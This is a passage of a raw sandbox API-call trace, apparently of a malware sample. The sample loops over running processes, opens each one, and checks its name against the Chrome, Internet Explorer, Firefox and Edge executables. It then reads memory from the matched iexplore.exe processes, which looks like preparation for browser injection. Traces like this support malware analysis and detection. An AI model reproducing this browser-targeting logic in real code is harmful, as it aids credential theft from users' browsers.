	[0202.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.876] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.876] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0202.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.876] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.877] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0202.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2404
	[0202.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.877] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0202.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.878] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.879] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0202.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.879] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.880] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0202.880] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2408
	[0202.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.881] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0202.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.881] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.881] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0202.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.881] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.881] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0202.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x240c
	[0202.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.882] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0202.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.883] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.883] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0202.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.884] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.884] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0202.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2410
	[0202.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.885] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0202.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.885] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.886] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0202.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.886] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.886] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0202.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2414
	[0202.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.887] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0202.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.887] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.888] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0202.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.888] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.888] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0202.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2418
	[0202.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.889] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0202.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.889] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.889] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0202.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.890] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.890] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0202.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x241c
	[0202.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.890] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0202.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.891] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.891] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0202.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.892] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.892] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0202.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2420
	[0202.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.893] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0202.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.893] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.897] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0202.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.898] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.898] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0202.899] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2424
	[0202.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.899] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0202.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.899] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.900] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0202.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.900] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.901] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0202.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2428
	[0202.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.901] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0202.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.902] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.903] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0202.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.903] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.904] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0202.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x242c
	[0202.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.904] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0202.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.905] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.905] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0202.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.906] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.906] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2430
	[0202.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.907] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.907] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.907] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.908] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.908] NtQueryInformationProcess (in: ProcessHandle=0x2430, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.908] ReadProcessMemory (in: hProcess=0x2430, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.908] ReadProcessMemory (in: hProcess=0x2430, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.908] ReadProcessMemory (in: hProcess=0x2430, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.908] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2434
	[0202.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.909] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.910] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.910] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.910] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.910] NtQueryInformationProcess (in: ProcessHandle=0x2434, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.910] ReadProcessMemory (in: hProcess=0x2434, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.910] ReadProcessMemory (in: hProcess=0x2434, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.911] ReadProcessMemory (in: hProcess=0x2434, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.911] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.911] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0202.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2438
	[0202.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.912] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0202.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.912] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.912] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0202.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.913] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.913] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0202.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x243c
	[0202.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.914] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0202.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.914] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.914] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0202.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.915] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.915] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2440
	[0202.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.916] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.916] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.916] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.917] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.917] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.917] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2444
	[0202.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.918] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.919] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.919] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.919] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.919] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0202.920] CloseHandle (hObject=0x188) returned 1
	[0202.920] Sleep (dwMilliseconds=0x64) 
	[0203.020] GetCurrentProcessId () returned 0x110
	[0203.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0203.023] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0203.025] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0203.026] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0203.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2448
	[0203.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.028] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.028] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.029] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.029] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.029] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x244c
	[0203.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.030] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.031] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.031] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.031] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.031] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0203.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2450
	[0203.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.032] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0203.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.033] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.033] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0203.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.034] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.034] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0203.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2454
	[0203.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.035] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0203.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.035] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.036] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0203.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.036] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
